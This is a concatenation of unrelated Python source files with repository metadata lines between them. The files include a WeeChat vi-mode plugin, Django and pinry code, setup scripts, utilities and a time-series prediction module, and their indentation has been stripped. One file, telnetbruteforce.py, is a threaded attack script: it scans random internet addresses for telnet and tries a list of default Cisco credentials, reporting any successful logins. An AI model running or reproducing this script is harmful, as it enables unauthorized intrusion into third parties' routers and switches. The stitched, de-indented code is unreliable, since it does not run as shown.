current_cur = weechat.buffer_get_integer(buf, "input_pos")
set_cur(buf, input_line, current_cur)
else:
VI_KEYS[vi_keys](buf, input_line, cur, count)
# It's a motion (e.g. "w") — call `motion_X()` where X is the motion, then
# set the cursor's position to what that function returned.
elif vi_keys in VI_MOTIONS:
if vi_keys in SPECIAL_CHARS:
func = "motion_%s" % SPECIAL_CHARS[vi_keys]
else:
func = "motion_%s" % vi_keys
end, _, _ = globals()[func](input_line, cur, count)
set_cur(buf, input_line, end)
# It's an operator + motion (e.g. "dw") — call `motion_X()` (where X is
# the motion), then we call `operator_Y()` (where Y is the operator)
# with the position `motion_X()` returned. `operator_Y()` should then
# handle changing the input line.
elif (len(vi_keys) > 1 and
vi_keys[0] in VI_OPERATORS and
vi_keys[1:] in VI_MOTIONS):
if vi_keys[1:] in SPECIAL_CHARS:
func = "motion_%s" % SPECIAL_CHARS[vi_keys[1:]]
else:
func = "motion_%s" % vi_keys[1:]
pos, overwrite, catching = globals()[func](input_line, cur, count)
# If it's a catching motion, we don't want to call the operator just
# yet -- this code will run again when the motion is complete, at which
# point we will.
if not catching:
oper = "operator_%s" % vi_keys[0]
globals()[oper](buf, input_line, cur, pos, overwrite)
# The combo isn't completed yet (e.g. just "d").
else:
return weechat.WEECHAT_RC_OK_EAT
# We've already handled the key combo, so clear the keys buffer.
if not catching_keys_data['amount']:
vi_buffer = ""
weechat.bar_item_update("vi_buffer")
return weechat.WEECHAT_RC_OK_EAT
# Callbacks.
# ==========
# Bar items.
# ----------
def cb_vi_buffer(data, item, window):
"""Return the content of the vi buffer (pressed keys on hold)."""
return vi_buffer
def cb_cmd_text(data, item, window):
"""Return the text of the command line."""
return cmd_text
def cb_mode_indicator(data, item, window):
"""Return the current mode (INSERT/NORMAL/REPLACE)."""
return mode
def cb_line_numbers(data, item, window):
"""Fill the line numbers bar item."""
bar_height = weechat.window_get_integer(window, "win_chat_height")
content = ""
for i in range(1, bar_height + 1):
content += "%s \n" % i
return content
# Callbacks for the line numbers bar.
# ...................................
def cb_update_line_numbers(data, signal, signal_data):
"""Call `cb_timer_update_line_numbers()` when switching buffers.
A timer is required because the bar item is refreshed before the new buffer
is actually displayed, so ``win_chat_height`` would refer to the old
buffer. Using a timer refreshes the item after the new buffer is displayed.
"""
weechat.hook_timer(10, 0, 1, "cb_timer_update_line_numbers", "")
return weechat.WEECHAT_RC_OK
def cb_timer_update_line_numbers(data, remaining_calls):
"""Update the line numbers bar item."""
weechat.bar_item_update("line_numbers")
return weechat.WEECHAT_RC_OK
# Config.
# -------
def cb_config(data, option, value):
"""Script option changed, update our copy."""
option_name = option.split(".")[-1]
if option_name in vimode_settings:
vimode_settings[option_name] = value
return weechat.WEECHAT_RC_OK
# Command-line execution.
# -----------------------
def cb_exec_cmd(data, remaining_calls):
"""Translate and execute our custom commands to WeeChat command."""
# Process the entered command.
data = list(data)
del data[0]
data = "".join(data)
# s/foo/bar command.
if data.startswith("s/"):
cmd = data
parsed_cmd = next(csv.reader(StringIO(cmd), delimiter="/",
escapechar="\\"))
pattern = re.escape(parsed_cmd[1])
repl = parsed_cmd[2]
repl = re.sub(r"([^\\])&", r"\1" + pattern, repl)
flag = None
if len(parsed_cmd) == 4:
flag = parsed_cmd[3]
count = 1
if flag == "g":
count = 0
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
input_line = re.sub(pattern, repl, input_line, count)
weechat.buffer_set(buf, "input", input_line)
# Shell command.
elif data.startswith("!"):
weechat.command("", "/exec -buffer shell %s" % data[1:])
# Commands like `:22`. This should start cursor mode (``/cursor``) and take
# us to the relevant line.
# TODO: look into possible replacement key bindings for: ← ↑ → ↓ Q m q.
elif data.isdigit():
line_number = int(data)
hdata_window = weechat.hdata_get("window")
window = weechat.current_window()
x = weechat.hdata_integer(hdata_window, window, "win_chat_x")
y = (weechat.hdata_integer(hdata_window, window, "win_chat_y") +
(line_number - 1))
weechat.command("", "/cursor go {},{}".format(x, y))
# Check againt defined commands.
else:
data = data.split(" ", 1)
cmd = data[0]
args = ""
if len(data) == 2:
args = data[1]
if cmd in VI_COMMANDS:
weechat.command("", "%s %s" % (VI_COMMANDS[cmd], args))
# No vi commands defined, run the command as a WeeChat command.
else:
weechat.command("", "/{} {}".format(cmd, args))
return weechat.WEECHAT_RC_OK
# Script commands.
# ----------------
def cb_vimode_cmd(data, buf, args):
"""Handle script commands (``/vimode <command>``)."""
# ``/vimode`` or ``/vimode help``
if not args or args == "help":
weechat.prnt("", "[vimode.py] %s" % README_URL)
# ``/vimode bind_keys`` or ``/vimode bind_keys --list``
elif args.startswith("bind_keys"):
infolist = weechat.infolist_get("key", "", "default")
weechat.infolist_reset_item_cursor(infolist)
commands = ["/key unbind ctrl-W",
"/key bind ctrl-W /input delete_previous_word",
"/key bind ctrl-^ /input jump_last_buffer_displayed",
"/key bind ctrl-Wh /window left",
"/key bind ctrl-Wj /window down",
"/key bind ctrl-Wk /window up",
"/key bind ctrl-Wl /window right",
"/key bind ctrl-W= /window balance",
"/key bind ctrl-Wx /window swap",
"/key bind ctrl-Ws /window splith",
"/key bind ctrl-Wv /window splitv",
"/key bind ctrl-Wq /window merge"]
while weechat.infolist_next(infolist):
key = weechat.infolist_string(infolist, "key")
if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key):
commands.append("/key unbind %s" % key)
if args == "bind_keys":
weechat.prnt("", "Running commands:")
for command in commands:
weechat.command("", command)
weechat.prnt("", "Done.")
elif args == "bind_keys --list":
weechat.prnt("", "Listing commands we'll run:")
for command in commands:
weechat.prnt("", " %s" % command)
weechat.prnt("", "Done.")
return weechat.WEECHAT_RC_OK
# Helpers.
# ========
# Motions/keys helpers.
# ---------------------
def get_pos(data, regex, cur, ignore_cur=False, count=0):
"""Return the position of `regex` match in `data`, starting at `cur`.
Args:
data (str): the data to search in.
regex (pattern): regex pattern to search for.
cur (int): where to start the search.
ignore_cur (bool, optional): should the first match be ignored if it's
also the character at `cur`?
Defaults to False.
count (int, optional): the index of the match to return. Defaults to 0.
Returns:
int: position of the match. -1 if no matches are found.
"""
# List of the *positions* of the found patterns.
matches = [m.start() for m in re.finditer(regex, data[cur:])]
pos = -1
if count:
if len(matches) > count - 1:
if ignore_cur and matches[0] == 0:
if len(matches) > count:
pos = matches[count]
else:
pos = matches[count - 1]
elif matches:
if ignore_cur and matches[0] == 0:
if len(matches) > 1:
pos = matches[1]
else:
pos = matches[0]
return pos
def set_cur(buf, input_line, pos, cap=True):
"""Set the cursor's position.
Args:
buf (str): pointer to the current WeeChat buffer.
input_line (str): the content of the input line.
pos (int): the position to set the cursor to.
cap (bool, optional): if True, the `pos` will shortened to the length
of `input_line` if it's too long. Defaults to True.
"""
if cap:
pos = min(pos, len(input_line) - 1)
weechat.buffer_set(buf, "input_pos", str(pos))
def start_catching_keys(amount, callback, input_line, cur, count, buf=None):
"""Start catching keys. Used for special commands (e.g. "f", "r").
amount (int): amount of keys to catch.
callback (str): name of method to call once all keys are caught.
input_line (str): input line's content.
cur (int): cursor's position.
count (int): count, e.g. "2" for "2fs".
buf (str, optional): pointer to the current WeeChat buffer.
Defaults to None.
`catching_keys_data` is a dict with the above arguments, as well as:
keys (str): pressed keys will be added under this key.
new_cur (int): the new cursor's position, set in the callback.
When catching keys is active, normal pressed keys (e.g. "a" but not arrows)
will get added to `catching_keys_data` under the key "keys", and will not
be handled any further.
Once all keys are caught, the method defined in the "callback" key is
called, and can use the data in `catching_keys_data` to perform its action.
"""
global catching_keys_data
if "new_cur" in catching_keys_data:
new_cur = catching_keys_data['new_cur']
catching_keys_data = {'amount': 0}
return new_cur, True, False
catching_keys_data = ({'amount': amount,
'callback': callback,
'input_line': input_line,
'cur': cur,
'keys': "",
'count': count,
'new_cur': 0,
'buf': buf})
return cur, False, True
def get_keys_and_count(combo):
"""Check if `combo` is a valid combo and extract keys/counts if so.
Args:
combo (str): pressed keys combo.
Returns:
matched (bool): True if the combo has a (partial or full) match, False
otherwise.
combo (str): `combo` with the count removed. These are the actual keys
we should handle.
count (int): count for `combo`.
"""
# Look for a potential match (e.g. "d" might become "dw" or "dd" so we
# accept it, but "d9" is invalid).
matched = False
# Digits are allowed at the beginning (counts or "0").
count = 0
if combo.isdigit():
matched = True
elif combo and combo[0].isdigit():
count = ""
for char in combo:
if char.isdigit():
count += char
else:
break
combo = combo.replace(count, "", 1)
count = int(count)
# Check against defined keys.
if not matched:
for key in VI_KEYS:
if key.startswith(combo):
matched = True
break
# Check against defined motions.
if not matched:
for motion in VI_MOTIONS:
if motion.startswith(combo):
matched = True
break
# Check against defined operators + motions.
if not matched:
for operator in VI_OPERATORS:
if combo.startswith(operator):
# Check for counts before the motion (but after the operator).
vi_keys_no_op = combo[len(operator):]
# There's no motion yet.
if vi_keys_no_op.isdigit():
matched = True
break
# Get the motion count, then multiply the operator count by
# it, similar to vim's behavior.
elif vi_keys_no_op and vi_keys_no_op[0].isdigit():
motion_count = ""
for char in vi_keys_no_op:
if char.isdigit():
motion_count += char
else:
break
# Remove counts from `vi_keys_no_op`.
combo = combo.replace(motion_count, "", 1)
motion_count = int(motion_count)
count = max(count, 1) * motion_count
# Check against defined motions.
for motion in VI_MOTIONS:
if motion.startswith(combo[1:]):
matched = True
break
return matched, combo, count
# Other helpers.
# --------------
def set_mode(arg):
"""Set the current mode and update the bar mode indicator."""
global mode
mode = arg
# If we're going to Normal mode, the cursor must move one character to the
# left.
if mode == "NORMAL":
buf = weechat.current_buffer()
input_line = weechat.buffer_get_string(buf, "input")
cur = weechat.buffer_get_integer(buf, "input_pos")
set_cur(buf, input_line, cur - 1, False)
weechat.bar_item_update("mode_indicator")
def print_warning(text):
"""Print warning, in red, to the current buffer."""
weechat.prnt("", ("%s[vimode.py] %s" % (weechat.color("red"), text)))
def check_warnings():
"""Warn the user about problematic key bindings and tmux/screen."""
user_warned = False
# Warn the user about problematic key bindings that may conflict with
# vimode.
# The solution is to remove these key bindings, but that's up to the user.
infolist = weechat.infolist_get("key", "", "default")
problematic_keybindings = []
while weechat.infolist_next(infolist):
key = weechat.infolist_string(infolist, "key")
command = weechat.infolist_string(infolist, "command")
if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key):
problematic_keybindings.append("%s -> %s" % (key, command))
if problematic_keybindings:
user_warned = True
print_warning("Problematic keybindings detected:")
for keybinding in problematic_keybindings:
print_warning(" %s" % keybinding)
print_warning("These keybindings may conflict with vimode.")
print_warning("You can remove problematic key bindings and add"
" recommended ones by using /vimode bind_keys, or only"
" list them with /vimode bind_keys --list")
print_warning("For help, see: %s" % FAQ_KEYBINDINGS)
del problematic_keybindings
# Warn tmux/screen users about possible Esc detection delays.
if "STY" in os.environ or "TMUX" in os.environ:
if user_warned:
weechat.prnt("", "")
user_warned = True
print_warning("tmux/screen users, see: %s" % FAQ_ESC)
if (user_warned and not
weechat.config_string_to_boolean(vimode_settings['no_warn'])):
if user_warned:
weechat.prnt("", "")
print_warning("To force disable warnings, you can set"
" plugins.var.python.vimode.no_warn to 'on'")
# Main script.
# ============
if __name__ == "__main__":
weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION,
SCRIPT_LICENSE, SCRIPT_DESC, "", "")
# Warn the user if he's using an unsupported WeeChat version.
VERSION = weechat.info_get("version_number", "")
if int(VERSION) < 0x01000000:
print_warning("Please upgrade to WeeChat ≥ 1.0.0. Previous versions"
" are not supported.")
# Set up script options.
for option, value in vimode_settings.items():
if weechat.config_is_set_plugin(option):
vimode_settings[option] = weechat.config_get_plugin(option)
else:
weechat.config_set_plugin(option, value[0])
vimode_settings[option] = value[0]
weechat.config_set_desc_plugin(option,
"%s (default: \"%s\")" % (value[1],
value[0]))
# Warn the user about possible problems if necessary.
if not weechat.config_string_to_boolean(vimode_settings['no_warn']):
check_warnings()
# Create bar items and setup hooks.
weechat.bar_item_new("mode_indicator", "cb_mode_indicator", "")
weechat.bar_item_new("cmd_text", "cb_cmd_text", "")
weechat.bar_item_new("vi_buffer", "cb_vi_buffer", "")
weechat.bar_item_new("line_numbers", "cb_line_numbers", "")
weechat.bar_new("vi_cmd", "off", "0", "root", "", "bottom", "vertical",
"vertical", "0", "0", "default", "default", "default", "0",
"cmd_text")
weechat.bar_new("vi_line_numbers", "on", "0", "window", "", "left",
"vertical", "vertical", "0", "0", "default", "default",
"default", "0", "line_numbers")
weechat.hook_config("plugins.var.python.%s.*" % SCRIPT_NAME, "cb_config",
"")
weechat.hook_signal("key_pressed", "cb_key_pressed", "")
weechat.hook_signal("key_combo_default", "cb_key_combo_default", "")
weechat.hook_signal("buffer_switch", "cb_update_line_numbers", "")
weechat.hook_command("vimode", SCRIPT_DESC, "[help | bind_keys [--list]]",
" help: show help\n"
"bind_keys: unbind problematic keys, and bind"
" recommended keys to use in WeeChat\n"
" --list: only list changes",
"help || bind_keys |--list",
"cb_vimode_cmd", "")
| mit | 6,677,825,719,635,397,000 | 34.017289 | 79 | 0.56929 | false | 3.530294 | false | false | false |
sinner/testing-djrf | tutorial/snippets/views/SnippetDetail.py | 1 | 1959 | from snippets.models import Snippet
from snippets.serializers import SnippetSerializer
from django.http import Http404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
class SnippetDetail(APIView):
"""
Retrieve, update or delete a snippet instance.
"""
def get_object(self, pk):
try:
return Snippet.objects.get(pk=pk)
except Snippet.DoesNotExist:
raise Http404
def get(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet)
return Response({
'message': 'The snippet has been found successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
})
def put(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet, data=request.data)
if serializer.is_valid():
serializer.save()
return Response({
'message': 'The snippet has been updated successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
})
return Response({
'message': 'There are one or more errors in the data sent.',
'data': request.data,
'error': True,
'errorDetails': serializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
snippet = self.get_object(pk)
serializer = SnippetSerializer(snippet)
snippet.delete()
return Response({
'message': 'The snippet has been deleted successfully.',
'data': serializer.data,
'error': False,
'errorDetails': None
}, status=status.HTTP_204_NO_CONTENT)
| mit | -3,647,904,103,707,750,400 | 33.982143 | 72 | 0.58244 | false | 4.587822 | false | false | false |
hammerlab/varcode | setup.py | 1 | 2683 | # Copyright (c) 2014-2019. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
from setuptools import setup, find_packages
readme_filename = "README.md"
current_directory = os.path.dirname(__file__)
readme_path = os.path.join(current_directory, readme_filename)
try:
with open(readme_path, 'r') as f:
readme_markdown = f.read()
except Exception as e:
readme_markdown = ""
print(e)
print("Failed to open %s" % readme_path)
# Determine version number
with open('varcode/__init__.py', 'r') as f:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(),
re.MULTILINE).group(1)
print("Version: %s" % version)
if __name__ == '__main__':
setup(
name='varcode',
packages=find_packages(),
package_data={'varcode.cli': ['logging.conf']},
version=version,
description="Variant annotation in Python",
long_description=readme_markdown,
long_description_content_type='text/markdown',
url="https://github.com/openvax/varcode",
author="Alex Rubinsteyn",
author_email="[email protected]",
license="http://www.apache.org/licenses/LICENSE-2.0.html",
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
install_requires=[
'numpy>=1.7, <2.0',
'pandas>=0.15',
'pyensembl>=1.8.1',
'biopython>=1.64',
'pyvcf>=0.6.7',
'memoized_property>=1.0.2',
'serializable>=0.2.1',
'sercol>=0.1.4',
],
entry_points={
'console_scripts': [
'varcode-genes = varcode.cli.genes_script:main',
'varcode = varcode.cli.effects_script:main',
]
})
| apache-2.0 | 7,290,187,730,248,771,000 | 33.397436 | 74 | 0.598211 | false | 3.747207 | false | false | false |
ubuntunux/GuineaPig | PyEngine3D/Utilities/Utility.py | 2 | 2490 | import time
import sys
import gc
import os
import datetime
class Profiler:
profile_map = {}
start_time = 0.0
section_start_time = 0.0
@staticmethod
def start(profile_name=''):
if profile_name not in Profiler.profile_map:
Profiler.profile_map[profile_name] = time.perf_counter()
else:
print('%s is already exists.' % profile_name)
@staticmethod
def end(profile_name=''):
if profile_name in Profiler.profile_map:
start_time = Profiler.profile_map.pop(profile_name)
print('%s : %.2fms' % (profile_name, (time.perf_counter() - start_time) * 1000.0))
@staticmethod
def set_stop_watch():
Profiler.start_time = time.perf_counter()
Profiler.section_start_time = Profiler.start_time
@staticmethod
def get_stop_watch(profile_name=''):
current_time = time.perf_counter()
print('%s : %.2fms ( elapsed %.2fms )' % (profile_name,
(current_time - Profiler.section_start_time) * 1000.0,
(current_time - Profiler.start_time) * 1000.0))
Profiler.section_start_time = current_time
@staticmethod
def check(func):
def decoration(*args, **kargs):
start_time = time.perf_counter()
result = func(*args, **kargs)
print('%s : %.2fms' % (func.__name__, (time.perf_counter() - start_time) * 1000.0))
return result
return decoration
def GetClassName(cls):
return cls.__class__.__name__
def is_gz_compressed_file(filename):
with open(filename,'rb') as f:
return f.read(3) == b'\x1f\x8b\x08'
return False
def check_directory_and_mkdir(dirname):
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
def get_modify_time_of_file(filepath):
if filepath != "" and os.path.exists(filepath):
timeStamp = os.path.getmtime(filepath)
return str(datetime.datetime.fromtimestamp(timeStamp))
return str(datetime.datetime.min)
def delete_from_referrer(obj):
"""
desc : Find and remove all references to obj.
"""
referrers = gc.get_referrers(obj)
for referrer in referrers:
if type(referrer) == dict:
for key, value in referrer.items():
if value is obj:
referrer[key] = None
def object_copy(src, dst):
dst.__dict__ = src.__dict__
| bsd-2-clause | -4,164,883,789,592,392,000 | 28.294118 | 109 | 0.582731 | false | 3.733133 | false | false | false |
snipperrifle/Router-Telnet-BadDay | telnetbruteforce.py | 1 | 3132 | import threading
import telnetlib
import sys
import socket
import random
import thread
import time
print "|","-"*61, "|"
print "|\tAll of cisco routers , switches with default\t\t|\n|\tusername and passwords are will have a bad day today\t|"
print "|","-"*61, "|"
def bruteForce(ip):
dict={"Administrator":"admin","|Administrator":"changeme","cisco":"cisco","admin":"admin","|admin":"diamond","||admin":"cisco","root":"Cisco","|root":"password","||root":"blender","|||root":"attack","bbsd-client":"changeme2","cmaker":"cmaker","cusadmin":"password","hsa":"hsadb","netrangr":"attack","wlse":"wlsedb","wlseuser":"wlseuser"}
for key,value in dict.iteritems():
key = key.replace("|" , "")
try:
#print " Trying User:",key," Password:",value ," on " , ip
tn = telnetlib.Telnet(ip,23,2)
tn.read_until((":" or ">" or "$" or "@"))
tn.write(key + "\n")
tn.read_until((":" or ">" or "$" or "@"))
tn.write(value + "\n")
tn.write("dir\n")
tn.write("exit\n")
tn.read_all()#we can print this to get the banner
print "\t\nLogin successful:", key , " -> " , value
tn.close()
sys.exit(1)
except Exception ,e:
#print ip , " --> " , e
pass
finally:
try:
tn.close()
except Exception , e:
pass
#randy()
def randy():
a=random.randint(1,254)
b=random.randint(1,254)
c=random.randint(1,254)
d=random.randint(1,4)
ip=str(a) + "." +str(b) + "." +str(c) + "." +str(d)
try:
telnetlib.Telnet(ip , 23 , 2)
print "Telneting on host : " , ip
bruteForce(ip)
except Exception ,e:
#print ip," => does not have telnet enabled" , e
randy()
for threads in range(0,20):
thread.start_new_thread(randy,())
time.sleep(0.5)
"""
if len(sys.argv) !=4:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit(1)
#----------------------------------------------------------------
try:
userlist = open(sys.argv[2], "r").readlines()
#userlist.close()
for user in userlist:
user = user.strip("\n")
users.append(user)
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
#------------------------------------------------------------------
try:
wordlist = open(sys.argv[3], "r").readlines()
#wordlist.close()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
for word in wordlist:
words.append(word)
#lock = threading.Lock()
#lock.acquire()
#lock.release()
for key , value in dict.iteritems():
print key.replace("|","")+"="+value
"""
| gpl-2.0 | -9,115,303,984,904,878,000 | 31.968421 | 345 | 0.462005 | false | 3.810219 | false | false | false |
hsab/UMOG | umog_addon/sockets/boolean.py | 1 | 1147 | import bpy
import sys
from bpy.props import *
from .. base_types import UMOGSocket
from .. utils.events import propUpdate
class BooleanSocket(bpy.types.NodeSocket, UMOGSocket):
# Description string
'''Custom Boolean socket type'''
# Optional identifier string. If not explicitly defined, the python class name is used.
bl_idname = 'BooleanSocketType'
# Label for nice name display
bl_label = 'Boolean Socket'
dataType = "Boolean"
allowedInputTypes = ["Float", "Integer", "Boolean"]
useIsUsedProperty = False
defaultDrawType = "PREFER_PROPERTY"
drawColor = (0.247058824, 0.317647059, 0.705882353, 1)
value = BoolProperty(default=True, update=propUpdate)
def drawProperty(self, context, layout, layoutParent, text, node):
layout.prop(self, "value", text=text)
pass
def refresh(self):
self.name = str(self.value)
def getValue(self):
return self.value
def setProperty(self, data):
if type(data) is bool:
self.value = data
else:
self.value = data > 0
def getProperty(self):
return self.value
| gpl-3.0 | 7,742,348,119,109,303,000 | 25.674419 | 91 | 0.658239 | false | 3.83612 | false | false | false |
WebSciences/searcular-old | pinry/settings/__init__.py | 1 | 2867 | import os
# import djcelery
from django.contrib.messages import constants as messages
# djcelery.setup_loader()
SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')
# Changes the naming on the front-end of the website.
SITE_NAME = 'Searcular v2'
# Set to False to disable people from creating new accounts.
ALLOW_NEW_REGISTRATIONS = True
# Set to False to force users to login before seeing any pins.
PUBLIC = True
TIME_ZONE = 'Europe/London'
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(SITE_ROOT, 'media')
STATIC_ROOT = os.path.join(SITE_ROOT, 'static')
TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')]
STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')]
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder'
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'pinry.users.middleware.Public',
'pinry.core.middleware.Public',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'pinry.core.context_processors.template_settings',
)
AUTHENTICATION_BACKENDS = (
'pinry.users.auth.backends.CombinedAuthBackend',
'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'pinry.urls'
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
INTERNAL_IPS = ['127.0.0.1']
MESSAGE_TAGS = {
messages.WARNING: 'alert',
messages.ERROR: 'alert alert-error',
messages.SUCCESS: 'alert alert-success',
messages.INFO: 'alert alert-info',
}
API_LIMIT_PER_PAGE = 50
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'taggit',
'compressor',
'django_images',
'provider',
'provider.oauth2',
'pinry.core',
'pinry.users',
)
IMAGE_PATH = 'pinry.core.utils.upload_path'
IMAGE_SIZES = {
'thumbnail': {'size': [240, 0]},
'standard': {'size': [600, 0]},
'square': {'crop': True, 'size': [125, 125]},
}
| agpl-3.0 | 8,192,452,103,675,637,000 | 26.04717 | 79 | 0.697942 | false | 3.329849 | false | true | false |
kagklis/timeseries-summary | Prediction.py | 1 | 4455 | '''
The MIT License (MIT)
Copyright (c) 2016 kagklis
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from math import sqrt
import numpy as np
from copy import deepcopy
from pandas import Series, DatetimeIndex
import statsmodels.api as sm
from statsmodels.graphics.api import qqplot
from statsmodels.tsa.arima_model import _arma_predict_out_of_sample
def limit_range(values, nm, nM):
M = max(values)
m = min(values)
oldRange = M-m
newRange = nM-nm
for i in range(len(values)):
values[i] = (((values[i] - m)*newRange)/oldRange) + nm
return(values)
def mean(values):
return (sum(values)*1.0)/len(values)
def stanDev(values):
m = mean(values)
total_sum = 0
for i in range(len(values)):
total_sum += (values[i]-m)**2
under_root = (total_sum*1.0)/len(values)
return (m,sqrt(under_root))
def linreg(X, Y):
"""
return a,b in solution to y = ax + b such that root mean square distance between trend line and original points is minimized
"""
N = len(X)
Sx = Sy = Sxx = Syy = Sxy = 0.0
for x, y in zip(X, Y):
Sx = Sx + x
Sy = Sy + y
Sxx = Sxx + x*x
Syy = Syy + y*y
Sxy = Sxy + x*y
det = Sxx * N - Sx * Sx
return (Sxy * N - Sy * Sx)/det, (Sxx * Sy - Sx * Sxy)/det
def predict(data, Ds, AL, steps):
key = data.keys()
key = key[0]
V = len(data[key])
# Create N-step prediction using ARMA method on the initial timeseries
res = sm.tsa.ARMA(data[key][0:(V-1-steps)], (3, 0)).fit()
params = res.params
residuals = res.resid
p = res.k_ar
q = res.k_ma
k_exog = res.k_exog
k_trend = res.k_trend
temp = _arma_predict_out_of_sample(params, steps, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-steps)
pArma = [data[key][V-steps-1]]
pArma.extend(temp)
arma_t = Series(pArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("ARMA: \n",arma_t)
pred = deepcopy(data)
offset = 1
# Create N-step prediction using recursive ARMA method on the initial timeseries
for ss in range(steps, 0, -offset):
res = sm.tsa.ARMA(pred[key][0:(V-1-ss)], (3, 0)).fit()
params = res.params
residuals = res.resid
p = res.k_ar
q = res.k_ma
k_exog = res.k_exog
k_trend = res.k_trend
pred[key][V-ss] = _arma_predict_out_of_sample(params, offset, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-ss)[0]
rArma = [data[key][V-steps-1]]
rArma.extend(pred[key][V-steps:(V+1)])
arma_t_r = Series(rArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("rARMA: \n",arma_t_r)
# Create N-step prediction using Summarization Features
ext_Ds = np.pad(Ds, steps, mode='symmetric')
ext_Ds = [ext_Ds[len(ext_Ds)-steps+i] for i in range(steps)]
#print("Ds:",ext_Ds)
m, s = stanDev(data[key])
a,b = linreg(range(len(AL)), AL)
r = [a*index + b for index in range(len(AL)+steps)]
temp2 = [(ext_Ds[i]+r[len(AL)-1+i])/10 for i in range(steps)]
fcst = [data[key][V-steps-1]]
fcst.extend(temp2)
summarized_t = Series(fcst, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("Summarized: \n",summarized_t)
return(arma_t, arma_t_r, summarized_t)
| mit | 3,701,691,037,603,330,600 | 32.246269 | 146 | 0.642649 | false | 3.080913 | false | false | false |
gtest-org/test14 | jenkins_jobs/modules/general.py | 9 | 4236 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The Logrotate section allows you to automatically remove old build
history. It adds the ``logrotate`` attribute to the :ref:`Job`
definition.
All logrotate attributes have default "-1" value so you don't need to specify
that explicitly
Example::
- job:
name: test_job
logrotate:
daysToKeep: 3
numToKeep: 20
artifactDaysToKeep: -1
artifactNumToKeep: -1
The Assigned Node section allows you to specify which Jenkins node (or
named group) should run the specified job. It adds the ``node``
attribute to the :ref:`Job` definition.
Example::
- job:
name: test_job
node: precise
